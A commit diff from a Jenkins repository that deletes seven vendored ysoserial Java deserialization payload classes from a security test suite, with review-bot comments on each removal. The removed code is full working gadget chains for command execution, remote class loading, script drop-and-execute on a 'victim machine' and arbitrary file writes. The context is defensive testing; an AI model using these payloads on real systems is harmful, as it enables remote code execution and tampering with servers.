FIY695 / jenkins
Commit 4fc68251
Authored Nov 11, 2016 by Sam Van Oort

Compileable ysoserial classes

Parent: 8395b78c
Changes: 7 files changed, 0 additions and 569 deletions (+0 -569)

test/src/test/java/jenkins/security/security218/ysoserial/payloads/BeanShell1.java  +0 -51
test/src/test/java/jenkins/security/security218/ysoserial/payloads/JavassistWeld1.java  +0 -79
test/src/test/java/jenkins/security/security218/ysoserial/payloads/Jython1.java  +0 -106
test/src/test/java/jenkins/security/security218/ysoserial/payloads/MozillaRhino1.java  +0 -66
test/src/test/java/jenkins/security/security218/ysoserial/payloads/Myfaces1.java  +0 -92
test/src/test/java/jenkins/security/security218/ysoserial/payloads/Myfaces2.java  +0 -64
test/src/test/java/jenkins/security/security218/ysoserial/payloads/Wicket1.java  +0 -111
test/src/test/java/jenkins/security/security218/ysoserial/payloads/BeanShell1.java (deleted, mode 100644 → 0, as of parent 8395b78c)
package
jenkins.security.security218.ysoserial.payloads
;
import
bsh.Interpreter
;
import
bsh.XThis
;
import
java.lang.reflect.InvocationHandler
;
import
java.lang.reflect.Proxy
;
import
java.util.Comparator
;
import
java.util.PriorityQueue
;
import
jenkins.security.security218.ysoserial.payloads.util.Reflections
;
import
jenkins.security.security218.ysoserial.payloads.annotation.Dependencies
;
import
jenkins.security.security218.ysoserial.payloads.util.PayloadRunner
;
/**
* Credits: Alvaro Munoz (@pwntester) and Christian Schneider (@cschneider4711)
*/
@SuppressWarnings
({
"rawtypes"
,
"unchecked"
})
@Dependencies
({
"org.beanshell:bsh:2.0b5"
})
public
class
BeanShell1
extends
PayloadRunner
implements
ObjectPayload
<
PriorityQueue
>
{
public
PriorityQueue
getObject
(
String
command
)
throws
Exception
{
// BeanShell payload
String
payload
=
"compare(Object foo, Object bar) {new java.lang.ProcessBuilder(new String[]{\""
+
command
+
"\"}).start();return new Integer(1);}"
;
// Create Interpreter
Interpreter
i
=
new
Interpreter
();
// Evaluate payload
i
.
eval
(
payload
);
// Create InvocationHandler
XThis
xt
=
new
XThis
(
i
.
getNameSpace
(),
i
);
InvocationHandler
handler
=
(
InvocationHandler
)
Reflections
.
getField
(
xt
.
getClass
(),
"invocationHandler"
).
get
(
xt
);
// Create Comparator Proxy
Comparator
comparator
=
(
Comparator
)
Proxy
.
newProxyInstance
(
Comparator
.
class
.
getClassLoader
(),
new
Class
<?>[]{
Comparator
.
class
},
handler
);
// Prepare Trigger Gadget (will call Comparator.compare() during deserialization)
final
PriorityQueue
<
Object
>
priorityQueue
=
new
PriorityQueue
<
Object
>(
2
,
comparator
);
Object
[]
queue
=
new
Object
[]
{
1
,
1
};
Reflections
.
setFieldValue
(
priorityQueue
,
"queue"
,
queue
);
Reflections
.
setFieldValue
(
priorityQueue
,
"size"
,
2
);
return
priorityQueue
;
}
public
static
void
main
(
final
String
[]
args
)
throws
Exception
{
PayloadRunner
.
run
(
BeanShell1
.
class
,
args
);
}
}
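Review bot: neither the commit message nor this diff records why BeanShell1 is being dropped; the reason is visible in the file itself, namely `@Dependencies({"org.beanshell:bsh:2.0b5"})` and the `bsh.Interpreter` / `bsh.XThis` imports, which are third-party classes that this commit does not add to the build anywhere else. Please say so in the commit message ("payloads whose external dependencies are not on the test classpath"), and confirm that nothing in the surviving security218 test or in `PayloadRunner` still names `BeanShell1`, since a leftover reference would break compilation, the very thing the commit sets out to fix.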
test/src/test/java/jenkins/security/security218/ysoserial/payloads/JavassistWeld1.java (deleted, mode 100644 → 0, as of parent 8395b78c)
package
jenkins.security.security218.ysoserial.payloads
;
import
com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
;
import
org.jboss.weld.interceptor.builder.InterceptionModelBuilder
;
import
org.jboss.weld.interceptor.builder.MethodReference
;
import
org.jboss.weld.interceptor.proxy.DefaultInvocationContextFactory
;
import
org.jboss.weld.interceptor.proxy.InterceptorMethodHandler
;
import
org.jboss.weld.interceptor.reader.ClassMetadataInterceptorReference
;
import
org.jboss.weld.interceptor.reader.DefaultMethodMetadata
;
import
org.jboss.weld.interceptor.reader.ReflectiveClassMetadata
;
import
org.jboss.weld.interceptor.reader.SimpleInterceptorMetadata
;
import
org.jboss.weld.interceptor.spi.instance.InterceptorInstantiator
;
import
org.jboss.weld.interceptor.spi.metadata.InterceptorReference
;
import
org.jboss.weld.interceptor.spi.metadata.MethodMetadata
;
import
org.jboss.weld.interceptor.spi.model.InterceptionModel
;
import
org.jboss.weld.interceptor.spi.model.InterceptionType
;
import
jenkins.security.security218.ysoserial.payloads.annotation.Dependencies
;
import
jenkins.security.security218.ysoserial.payloads.util.Gadgets
;
import
jenkins.security.security218.ysoserial.payloads.util.PayloadRunner
;
import
java.lang.reflect.Constructor
;
import
java.util.*
;
/*
by @matthias_kaiser
*/
@SuppressWarnings
({
"rawtypes"
,
"unchecked"
})
@Dependencies
({
"javassist:javassist:3.12.1.GA"
,
"org.jboss.weld:weld-core:1.1.33.Final"
,
"javax.enterprise:cdi-api:1.0-SP1"
,
"javax.interceptor:javax.interceptor-api:3.1"
,
"org.jboss.interceptor:jboss-interceptor-spi:2.0.0.Final"
,
"org.slf4j:slf4j-api:1.7.21"
})
public
class
JavassistWeld1
implements
ObjectPayload
<
Object
>
{
public
Object
getObject
(
final
String
command
)
throws
Exception
{
final
Object
gadget
=
Gadgets
.
createTemplatesImpl
(
command
);
InterceptionModelBuilder
builder
=
InterceptionModelBuilder
.
newBuilderFor
(
HashMap
.
class
);
ReflectiveClassMetadata
metadata
=
(
ReflectiveClassMetadata
)
ReflectiveClassMetadata
.
of
(
HashMap
.
class
);
InterceptorReference
interceptorReference
=
ClassMetadataInterceptorReference
.
of
(
metadata
);
Set
<
InterceptionType
>
s
=
new
HashSet
<
InterceptionType
>();
s
.
add
(
org
.
jboss
.
weld
.
interceptor
.
spi
.
model
.
InterceptionType
.
POST_ACTIVATE
);
Constructor
defaultMethodMetadataConstructor
=
DefaultMethodMetadata
.
class
.
getDeclaredConstructor
(
Set
.
class
,
MethodReference
.
class
);
defaultMethodMetadataConstructor
.
setAccessible
(
true
);
MethodMetadata
methodMetadata
=
(
MethodMetadata
)
defaultMethodMetadataConstructor
.
newInstance
(
s
,
MethodReference
.
of
(
TemplatesImpl
.
class
.
getMethod
(
"newTransformer"
),
true
));
List
list
=
new
ArrayList
();
list
.
add
(
methodMetadata
);
Map
<
org
.
jboss
.
weld
.
interceptor
.
spi
.
model
.
InterceptionType
,
List
<
MethodMetadata
>>
hashMap
=
new
HashMap
<
org
.
jboss
.
weld
.
interceptor
.
spi
.
model
.
InterceptionType
,
List
<
MethodMetadata
>>();
hashMap
.
put
(
org
.
jboss
.
weld
.
interceptor
.
spi
.
model
.
InterceptionType
.
POST_ACTIVATE
,
list
);
SimpleInterceptorMetadata
simpleInterceptorMetadata
=
new
SimpleInterceptorMetadata
(
interceptorReference
,
true
,
hashMap
);
builder
.
interceptAll
().
with
(
simpleInterceptorMetadata
);
InterceptionModel
model
=
builder
.
build
();
HashMap
map
=
new
HashMap
();
map
.
put
(
"ysoserial"
,
"ysoserial"
);
DefaultInvocationContextFactory
factory
=
new
DefaultInvocationContextFactory
();
InterceptorInstantiator
interceptorInstantiator
=
new
InterceptorInstantiator
()
{
public
Object
createFor
(
InterceptorReference
paramInterceptorReference
)
{
return
gadget
;
}
};
return
new
InterceptorMethodHandler
(
map
,
metadata
,
model
,
interceptorInstantiator
,
factory
);
}
public
static
void
main
(
final
String
[]
args
)
throws
Exception
{
PayloadRunner
.
run
(
JavassistWeld1
.
class
,
args
);
}
}
\ No newline at end of file
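Review bot: this is the only payload in the commit that reaches `TemplatesImpl.newTransformer` through Weld's `InterceptorMethodHandler` (via `MethodReference.of(TemplatesImpl.class.getMethod("newTransformer"), true)` and an `InterceptorInstantiator` that returns the `Gadgets.createTemplatesImpl(command)` object), so if the security218 test was exercising each gadget chain against the deserialization blacklist, coverage of the `org.jboss.weld` chain goes with the file; worth a line in the commit message. The `@Dependencies` list names six artifacts (`javassist`, `weld-core`, `cdi-api`, `javax.interceptor-api`, `jboss-interceptor-spi`, `slf4j-api`) that no other file in this commit adds to the build, so deleting the class rather than changing the POM is the consistent choice.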
test/src/test/java/jenkins/security/security218/ysoserial/payloads/Jython1.java (deleted, mode 100644 → 0, as of parent 8395b78c)
package
jenkins.security.security218.ysoserial.payloads
;
import
org.apache.commons.io.FileUtils
;
import
org.python.core.*
;
import
java.math.BigInteger
;
import
java.io.File
;
import
java.lang.reflect.Proxy
;
import
java.util.Arrays
;
import
java.util.Comparator
;
import
java.util.PriorityQueue
;
import
jenkins.security.security218.ysoserial.payloads.util.Reflections
;
import
jenkins.security.security218.ysoserial.payloads.annotation.Dependencies
;
import
jenkins.security.security218.ysoserial.payloads.annotation.PayloadTest
;
import
jenkins.security.security218.ysoserial.payloads.util.PayloadRunner
;
/**
* Credits: Alvaro Munoz (@pwntester) and Christian Schneider (@cschneider4711)
*
* This version of Jython1 writes a python script on the victim machine and
* executes it. The format of the parameters is:
*
* <local path>;<remote path>
*
* Where local path is the python script's location on the attack box and
* remote path is the location where the script will be written/executed from.
* For example:
*
* "/home/albino_lobster/read_etc_passwd.py;/tmp/jython1.py"
*
* In the above example, if "read_etc_passwd.py" simply contained the string:
*
* raise Exception(open('/etc/passwd', 'r').read())
*
* Then, when deserialized, the script will read in /etc/passwd and raise an
* exception with its contents (which could be useful if the target returns
* exception information).
*/
@PayloadTest
(
skip
=
"non RCE"
)
@SuppressWarnings
({
"rawtypes"
,
"unchecked"
,
"restriction"
})
@Dependencies
({
"org.python:jython-standalone:2.5.2"
})
public
class
Jython1
extends
PayloadRunner
implements
ObjectPayload
<
PriorityQueue
>
{
public
PriorityQueue
getObject
(
String
command
)
throws
Exception
{
String
[]
paths
=
command
.
split
(
";"
);
if
(
paths
.
length
!=
2
)
{
throw
new
IllegalArgumentException
(
"Unsupported command "
+
command
+
" "
+
Arrays
.
toString
(
paths
));
}
// Set payload parameters
String
python_code
=
FileUtils
.
readFileToString
(
new
File
(
paths
[
0
]),
"UTF-8"
);
// Python bytecode to write a file on disk and execute it
String
code
=
"740000"
+
//0 LOAD_GLOBAL 0 (open)
"640100"
+
//3 LOAD_CONST 1 (remote path)
"640200"
+
//6 LOAD_CONST 2 ('w+')
"830200"
+
//9 CALL_FUNCTION 2
"7D0000"
+
//12 STORE_FAST 0 (file)
"7C0000"
+
//15 LOAD_FAST 0 (file)
"690100"
+
//18 LOAD_ATTR 1 (write)
"640300"
+
//21 LOAD_CONST 3 (python code)
"830100"
+
//24 CALL_FUNCTION 1
"01"
+
//27 POP_TOP
"7C0000"
+
//28 LOAD_FAST 0 (file)
"690200"
+
//31 LOAD_ATTR 2 (close)
"830000"
+
//34 CALL_FUNCTION 0
"01"
+
//37 POP_TOP
"740300"
+
//38 LOAD_GLOBAL 3 (execfile)
"640100"
+
//41 LOAD_CONST 1 (remote path)
"830100"
+
//44 CALL_FUNCTION 1
"01"
+
//47 POP_TOP
"640000"
+
//48 LOAD_CONST 0 (None)
"53"
;
//51 RETURN_VALUE
// Helping consts and names
PyObject
[]
consts
=
new
PyObject
[]{
new
PyString
(
""
),
new
PyString
(
paths
[
1
]),
new
PyString
(
"w+"
),
new
PyString
(
python_code
)};
String
[]
names
=
new
String
[]{
"open"
,
"write"
,
"close"
,
"execfile"
};
// Generating PyBytecode wrapper for our python bytecode
PyBytecode
codeobj
=
new
PyBytecode
(
2
,
2
,
10
,
64
,
""
,
consts
,
names
,
new
String
[]{
""
,
""
},
"noname"
,
"<module>"
,
0
,
""
);
Reflections
.
setFieldValue
(
codeobj
,
"co_code"
,
new
BigInteger
(
code
,
16
).
toByteArray
());
// Create a PyFunction Invocation handler that will call our python bytecode when intercepting any method
PyFunction
handler
=
new
PyFunction
(
new
PyStringMap
(),
null
,
codeobj
);
// Prepare Trigger Gadget
Comparator
comparator
=
(
Comparator
)
Proxy
.
newProxyInstance
(
Comparator
.
class
.
getClassLoader
(),
new
Class
<?>[]{
Comparator
.
class
},
handler
);
PriorityQueue
<
Object
>
priorityQueue
=
new
PriorityQueue
<
Object
>(
2
,
comparator
);
Object
[]
queue
=
new
Object
[]
{
1
,
1
};
Reflections
.
setFieldValue
(
priorityQueue
,
"queue"
,
queue
);
Reflections
.
setFieldValue
(
priorityQueue
,
"size"
,
2
);
return
priorityQueue
;
}
public
static
void
main
(
final
String
[]
args
)
throws
Exception
{
PayloadRunner
.
run
(
Jython1
.
class
,
args
);
}
}
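Review bot: Jython1 was already excluded from the payload test harness by `@PayloadTest(skip = "non RCE")`, so removing it costs no executed test coverage; stating that in the commit message would make the deletion self-evidently safe. Moot once the file is gone, but for anyone restoring it: the bytecode is packed with `new BigInteger(code, 16).toByteArray()`, which drops a leading `00` byte and prepends a sign byte when the first byte is `80` or above; it only works here because the first opcode is `74` (`LOAD_GLOBAL`), and a byte array built directly from the hex string would be the robust form.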
test/src/test/java/jenkins/security/security218/ysoserial/payloads/MozillaRhino1.java (deleted, mode 100644 → 0, as of parent 8395b78c)
package
jenkins.security.security218.ysoserial.payloads
;
import
com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl
;
import
org.mozilla.javascript.*
;
import
jenkins.security.security218.ysoserial.payloads.annotation.Dependencies
;
import
jenkins.security.security218.ysoserial.payloads.util.Gadgets
;
import
jenkins.security.security218.ysoserial.payloads.util.PayloadRunner
;
import
javax.management.BadAttributeValueExpException
;
import
java.lang.reflect.Constructor
;
import
java.lang.reflect.Field
;
import
java.lang.reflect.Method
;
/*
by @matthias_kaiser
*/
@SuppressWarnings
({
"rawtypes"
,
"unchecked"
})
@Dependencies
({
"rhino:js:1.7R2"
})
public
class
MozillaRhino1
implements
ObjectPayload
<
Object
>
{
public
Object
getObject
(
final
String
command
)
throws
Exception
{
Class
nativeErrorClass
=
Class
.
forName
(
"org.mozilla.javascript.NativeError"
);
Constructor
nativeErrorConstructor
=
nativeErrorClass
.
getDeclaredConstructor
();
nativeErrorConstructor
.
setAccessible
(
true
);
IdScriptableObject
idScriptableObject
=
(
IdScriptableObject
)
nativeErrorConstructor
.
newInstance
();
Context
context
=
Context
.
enter
();
NativeObject
scriptableObject
=
(
NativeObject
)
context
.
initStandardObjects
();
Method
enterMethod
=
Context
.
class
.
getDeclaredMethod
(
"enter"
);
NativeJavaMethod
method
=
new
NativeJavaMethod
(
enterMethod
,
"name"
);
idScriptableObject
.
setGetterOrSetter
(
"name"
,
0
,
method
,
false
);
Method
newTransformer
=
TemplatesImpl
.
class
.
getDeclaredMethod
(
"newTransformer"
);
NativeJavaMethod
nativeJavaMethod
=
new
NativeJavaMethod
(
newTransformer
,
"message"
);
idScriptableObject
.
setGetterOrSetter
(
"message"
,
0
,
nativeJavaMethod
,
false
);
Method
getSlot
=
ScriptableObject
.
class
.
getDeclaredMethod
(
"getSlot"
,
String
.
class
,
int
.
class
,
int
.
class
);
getSlot
.
setAccessible
(
true
);
Object
slot
=
getSlot
.
invoke
(
idScriptableObject
,
"name"
,
0
,
1
);
Field
getter
=
slot
.
getClass
().
getDeclaredField
(
"getter"
);
getter
.
setAccessible
(
true
);
Class
memberboxClass
=
Class
.
forName
(
"org.mozilla.javascript.MemberBox"
);
Constructor
memberboxClassConstructor
=
memberboxClass
.
getDeclaredConstructor
(
Method
.
class
);
memberboxClassConstructor
.
setAccessible
(
true
);
Object
memberboxes
=
memberboxClassConstructor
.
newInstance
(
enterMethod
);
getter
.
set
(
slot
,
memberboxes
);
NativeJavaObject
nativeObject
=
new
NativeJavaObject
(
scriptableObject
,
Gadgets
.
createTemplatesImpl
(
command
),
TemplatesImpl
.
class
);
idScriptableObject
.
setPrototype
(
nativeObject
);
BadAttributeValueExpException
badAttributeValueExpException
=
new
BadAttributeValueExpException
(
null
);
Field
valField
=
badAttributeValueExpException
.
getClass
().
getDeclaredField
(
"val"
);
valField
.
setAccessible
(
true
);
valField
.
set
(
badAttributeValueExpException
,
idScriptableObject
);
return
badAttributeValueExpException
;
}
public
static
void
main
(
final
String
[]
args
)
throws
Exception
{
PayloadRunner
.
run
(
MozillaRhino1
.
class
,
args
);
}
}
\ No newline at end of file
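Review bot: this is the only payload in the commit whose trigger is `javax.management.BadAttributeValueExpException` (its `val` field is set reflectively to the Rhino `NativeError` whose `name` and `message` getter slots pivot into `TemplatesImpl.newTransformer`), so if the security218 test enumerated trigger classes rather than gadget libraries, note the lost case in the commit message. Moot now, but the deleted `getObject` calls `Context.enter()` and never calls `Context.exit()`, leaving a Rhino `Context` bound to the calling thread; if the payload is ever restored the two should be paired in a `try`/`finally`.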
test/src/test/java/jenkins/security/security218/ysoserial/payloads/Myfaces1.java (deleted, mode 100644 → 0, as of parent 8395b78c)
package
jenkins.security.security218.ysoserial.payloads
;
import
javax.el.ELContext
;
import
javax.el.ExpressionFactory
;
import
javax.el.ValueExpression
;
import
javax.servlet.ServletContext
;
import
javax.servlet.ServletRequest
;
import
javax.servlet.ServletResponse
;
import
org.apache.myfaces.context.servlet.FacesContextImpl
;
import
org.apache.myfaces.context.servlet.FacesContextImplBase
;
import
org.apache.myfaces.el.CompositeELResolver
;
import
org.apache.myfaces.el.unified.FacesELContext
;
import
org.apache.myfaces.view.facelets.el.ValueExpressionMethodExpression
;
import
jenkins.security.security218.ysoserial.payloads.annotation.PayloadTest
;
import
jenkins.security.security218.ysoserial.payloads.util.Gadgets
;
import
jenkins.security.security218.ysoserial.payloads.util.PayloadRunner
;
import
jenkins.security.security218.ysoserial.payloads.util.Reflections
;
/**
*
* ValueExpressionImpl.getValue(ELContext)
* ValueExpressionMethodExpression.getMethodExpression(ELContext)
* ValueExpressionMethodExpression.getMethodExpression()
* ValueExpressionMethodExpression.hashCode()
* HashMap<K,V>.hash(Object)
* HashMap<K,V>.readObject(ObjectInputStream)
*
* Arguments:
* - an EL expression to execute
*
* Requires:
* - MyFaces
* - Matching EL impl (setup POM deps accordingly, so that the ValueExpression can be deserialized)
*
* @author mbechler
*/
@PayloadTest
(
skip
=
"Requires running MyFaces, no direct execution"
)
public
class
Myfaces1
implements
ObjectPayload
<
Object
>,
DynamicDependencies
{
public
Object
getObject
(
String
command
)
throws
Exception
{
return
makeExpressionPayload
(
command
);
}
public
static
String
[]
getDependencies
()
{
if
(
System
.
getProperty
(
"el"
)
==
null
||
"apache"
.
equals
(
System
.
getProperty
(
"el"
))
)
{
return
new
String
[]
{
"org.apache.myfaces.core:myfaces-impl:2.2.9"
,
"org.apache.myfaces.core:myfaces-api:2.2.9"
,
"org.mortbay.jasper:apache-el:8.0.27"
,
"javax.servlet:javax.servlet-api:3.1.0"
,
// deps for mocking the FacesContext
"org.mockito:mockito-core:1.10.19"
,
"org.hamcrest:hamcrest-core:1.1"
,
"org.objenesis:objenesis:2.1"
};
}
else
if
(
"juel"
.
equals
(
System
.
getProperty
(
"el"
))
)
{
return
new
String
[]
{
"org.apache.myfaces.core:myfaces-impl:2.2.9"
,
"org.apache.myfaces.core:myfaces-api:2.2.9"
,
"de.odysseus.juel:juel-impl:2.2.7"
,
"de.odysseus.juel:juel-api:2.2.7"
,
"javax.servlet:javax.servlet-api:3.1.0"
,
// deps for mocking the FacesContext
"org.mockito:mockito-core:1.10.19"
,
"org.hamcrest:hamcrest-core:1.1"
,
"org.objenesis:objenesis:2.1"
};
}
throw
new
IllegalArgumentException
(
"Invalid el type "
+
System
.
getProperty
(
"el"
));
}
public
static
Object
makeExpressionPayload
(
String
expr
)
throws
IllegalArgumentException
,
IllegalAccessException
,
Exception
{
FacesContextImpl
fc
=
new
FacesContextImpl
((
ServletContext
)
null
,
(
ServletRequest
)
null
,
(
ServletResponse
)
null
);
ELContext
elContext
=
new
FacesELContext
(
new
CompositeELResolver
(),
fc
);
Reflections
.
getField
(
FacesContextImplBase
.
class
,
"_elContext"
).
set
(
fc
,
elContext
);
ExpressionFactory
expressionFactory
=
ExpressionFactory
.
newInstance
();
ValueExpression
ve1
=
expressionFactory
.
createValueExpression
(
elContext
,
expr
,
Object
.
class
);
ValueExpressionMethodExpression
e
=
new
ValueExpressionMethodExpression
(
ve1
);
ValueExpression
ve2
=
expressionFactory
.
createValueExpression
(
elContext
,
"${true}"
,
Object
.
class
);
ValueExpressionMethodExpression
e2
=
new
ValueExpressionMethodExpression
(
ve2
);
return
Gadgets
.
makeMap
(
e2
,
e
);
}
public
static
void
main
(
final
String
[]
args
)
throws
Exception
{
PayloadRunner
.
run
(
Myfaces1
.
class
,
args
);
}
}
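Review bot: Myfaces1 and Myfaces2 must be removed together, since Myfaces2 calls `Myfaces1.getDependencies()` and `Myfaces1.makeExpressionPayload(expr)`; this commit does delete both, so please keep that pairing if either is ever restored. Note also that the class implements `DynamicDependencies` and picks `org.mortbay.jasper:apache-el` or `de.odysseus.juel:juel-impl` from the `el` system property, so bringing it back would require the matching EL implementation on the test classpath, as the javadoc's "Matching EL impl" line says, and not just `myfaces-impl` / `myfaces-api`.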
test/src/test/java/jenkins/security/security218/ysoserial/payloads/Myfaces2.java (deleted, mode 100644 → 0, as of parent 8395b78c)
package
jenkins.security.security218.ysoserial.payloads
;
import
jenkins.security.security218.ysoserial.payloads.annotation.PayloadTest
;
import
jenkins.security.security218.ysoserial.payloads.util.PayloadRunner
;
/**
*
* ValueExpressionImpl.getValue(ELContext)
* ValueExpressionMethodExpression.getMethodExpression(ELContext)
* ValueExpressionMethodExpression.getMethodExpression()
* ValueExpressionMethodExpression.hashCode()
* HashMap<K,V>.hash(Object)
* HashMap<K,V>.readObject(ObjectInputStream)
*
* Arguments:
* - base_url:classname
*
* Yields:
* - Instantiation of remotely loaded class
*
* Requires:
* - MyFaces
* - Matching EL impl (setup POM deps accordingly, so that the ValueExpression can be deserialized)
*
* @author mbechler
*/
@PayloadTest
(
harness
=
"ysoserial.payloads.MyfacesTest"
)
public
class
Myfaces2
implements
ObjectPayload
<
Object
>,
DynamicDependencies
{
public
static
String
[]
getDependencies
()
{
return
Myfaces1
.
getDependencies
();
}
public
Object
getObject
(
String
command
)
throws
Exception
{
int
sep
=
command
.
lastIndexOf
(
':'
);
if
(
sep
<
0
)
{
throw
new
IllegalArgumentException
(
"Command format is: <base_url>:<classname>"
);
}
String
url
=
command
.
substring
(
0
,
sep
);
String
className
=
command
.
substring
(
sep
+
1
);
// based on http://danamodio.com/appsec/research/spring-remote-code-with-expression-language-injection/
String
expr
=
"${request.setAttribute('arr',''.getClass().forName('java.util.ArrayList').newInstance())}"
;
// if we add fewer than the actual classloaders we end up with a null entry
for
(
int
i
=
0
;
i
<
100
;
i
++
)
{
expr
+=
"${request.getAttribute('arr').add(request.servletContext.getResource('/').toURI().create('"
+
url
+
"').toURL())}"
;
}
expr
+=
"${request.getClass().getClassLoader().newInstance(request.getAttribute('arr')"
+
".toArray(request.getClass().getClassLoader().getURLs())).loadClass('"
+
className
+
"').newInstance()}"
;
return
Myfaces1
.
makeExpressionPayload
(
expr
);
}
public
static
void
main
(
final
String
[]
args
)
throws
Exception
{
PayloadRunner
.
run
(
Myfaces2
.
class
,
args
);
}
}
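Review bot: the `@PayloadTest(harness = "ysoserial.payloads.MyfacesTest")` annotation points at the upstream ysoserial package rather than at `jenkins.security.security218.ysoserial.payloads`, where this vendored copy lives, so the harness reference was already stale before this deletion; if the payload is restored, the harness name must be rewritten to the vendored package. This is also the only payload of the seven whose effect is remote class loading (the EL builds a list of 100 copies of `url`, constructs a new instance of the request's class loader from it, then `loadClass(className).newInstance()`), which needs outbound network access from the test JVM and would have been the least reproducible in CI.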
test/src/test/java/jenkins/security/security218/ysoserial/payloads/Wicket1.java (deleted, mode 100644 → 0, as of parent 8395b78c)
package
jenkins.security.security218.ysoserial.payloads
;
import
java.io.File
;
import
java.io.IOException
;
import
java.io.OutputStream
;
import
java.util.Arrays
;
import
org.apache.commons.codec.binary.Base64
;
import
org.apache.wicket.util.upload.DiskFileItem
;
import
org.apache.wicket.util.io.DeferredFileOutputStream
;
import
org.apache.wicket.util.io.ThresholdingOutputStream
;
import
jenkins.security.security218.ysoserial.payloads.annotation.Dependencies
;
import
jenkins.security.security218.ysoserial.payloads.util.PayloadRunner
;
import
jenkins.security.security218.ysoserial.payloads.util.Reflections
;
/**
* This gadget is almost identical to FileUpload1 since it appears
* that Apache Wicket copied a version of Apache Commons DiskFileItem
* prior to Pierre Ernst reporting CVE-2013-2186 (NULL byte attack). That
* means that if the target is running less than Oracle Java 7 update 40
* then the NULL byte attack is viable. Otherwise, copy and move attacks
* always work.
*
* This attack is valid for the 1.x and 6.x lines of Apache Wicket but
* was fixed in 1.5.16 and 6.24.0 (released July 2016).
*
*
* Arguments:
* - copyAndDelete;sourceFile;destDir
* - write;destDir;ascii-data
* - writeB64;destDir;base64-data
* - writeOld;destFile;ascii-data
* - writeOldB64;destFile;base64-data
*
* Example:
* Wicket1 "write;/tmp;blue lobster"
*
* Result:
* $ ls -l /tmp/
* -rw-rw-r-- 1 albino_lobster albino_lobster 12 Jul 25 14:10 upload_3805815b_2d50_4e00_9dae_a854d5a0e614_479431761.tmp
* $ cat /tmp/upload_3805815b_2d50_4e00_9dae_a854d5a0e614_479431761.tmp
* blue lobster
*/
@Dependencies
({
"wicket-util:wicket-util:6.23"
})
public
class
Wicket1
implements
ReleaseableObjectPayload
<
DiskFileItem
>
{
public
DiskFileItem
getObject
(
String
command
)
throws
Exception
{
String
[]
parts
=
command
.
split
(
";"
);
if
(
parts
.
length
!=
3
)
{
throw
new
IllegalArgumentException
(
"Bad command format."
);
}
if
(
"copyAndDelete"
.
equals
(
parts
[
0
]))
{
return
copyAndDelete
(
parts
[
1
],
parts
[
2
]);
}
else
if
(
"write"
.
equals
(
parts
[
0
]))
{
return
write
(
parts
[
1
],
parts
[
2
].
getBytes
(
"US-ASCII"
));
}
else
if
(
"writeB64"
.
equals
(
parts
[
0
])
)
{
return
write
(
parts
[
1
],
Base64
.
decodeBase64
(
parts
[
2
]));
}
else
if
(
"writeOld"
.
equals
(
parts
[
0
])
)
{
return
writeOldJRE
(
parts
[
1
],
parts
[
2
].
getBytes
(
"US-ASCII"
));
}
else
if
(
"writeOldB64"
.
equals
(
parts
[
0
])
)
{
return
writeOldJRE
(
parts
[
1
],
Base64
.
decodeBase64
(
parts
[
2
]));
}
throw
new
IllegalArgumentException
(
"Unsupported command "
+
command
+
" "
+
Arrays
.
toString
(
parts
));
}
public
void
release
(
DiskFileItem
obj
)
throws
Exception
{
}
private
static
DiskFileItem
copyAndDelete
(
String
copyAndDelete
,
String
copyTo
)
throws
IOException
,
Exception
{
return
makePayload
(
0
,
copyTo
,
copyAndDelete
,
new
byte
[
1
]);
}
// writes data to a random filename (update_<per JVM random UUID>_<COUNTER>.tmp)
private
static
DiskFileItem
write
(
String
dir
,
byte
[]
data
)
throws
IOException
,
Exception
{
return
makePayload
(
data
.
length
+
1
,
dir
,
dir
+
"/whatever"
,
data
);
}
// writes data to an arbitrary file
private
static
DiskFileItem
writeOldJRE
(
String
file
,
byte
[]
data
)
throws
IOException
,
Exception
{
return
makePayload
(
data
.
length
+
1
,
file
+
"\0"
,
file
,
data
);
}
private
static
DiskFileItem
makePayload
(
int
thresh
,
String
repoPath
,
String
filePath
,
byte
[]
data
)
throws
IOException
,
Exception
{
// if thresh < written length, delete outputFile after copying to repository temp file
// otherwise write the contents to repository temp file
File
repository
=
new
File
(
repoPath
);
DiskFileItem
diskFileItem
=
new
DiskFileItem
(
"test"
,
"application/octet-stream"
,
false
,
"test"
,
100000
,
repository
,
null
);
File
outputFile
=
new
File
(
filePath
);
DeferredFileOutputStream
dfos
=
new
DeferredFileOutputStream
(
thresh
,
outputFile
);
OutputStream
os
=
(
OutputStream
)
Reflections
.
getFieldValue
(
dfos
,
"memoryOutputStream"
);
os
.
write
(
data
);
Reflections
.
getField
(
ThresholdingOutputStream
.
class
,
"written"
).
set
(
dfos
,
data
.
length
);
Reflections
.
setFieldValue
(
diskFileItem
,
"dfos"
,
dfos
);
Reflections
.
setFieldValue
(
diskFileItem
,
"sizeThreshold"
,
0
);
return
diskFileItem
;
}
public
static
void
main
(
final
String
[]
args
)
throws
Exception
{
PayloadRunner
.
run
(
FileUpload1
.
class
,
args
);
}
}
\ No newline at end of file
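Review bot: the deleted `main` runs `PayloadRunner.run(FileUpload1.class, args)` instead of `Wicket1.class`, so before this commit invoking `Wicket1` from the command line would have generated a FileUpload1 payload, not a Wicket one; moot once the file is gone, but if the class is restored the class literal should be `Wicket1.class`. The javadoc's `update_<per JVM random UUID>_<COUNTER>.tmp` comment above `write` also disagrees with the `upload_...tmp` filename shown in the class's own example output; the example is the one that matches `DiskFileItem` behaviour.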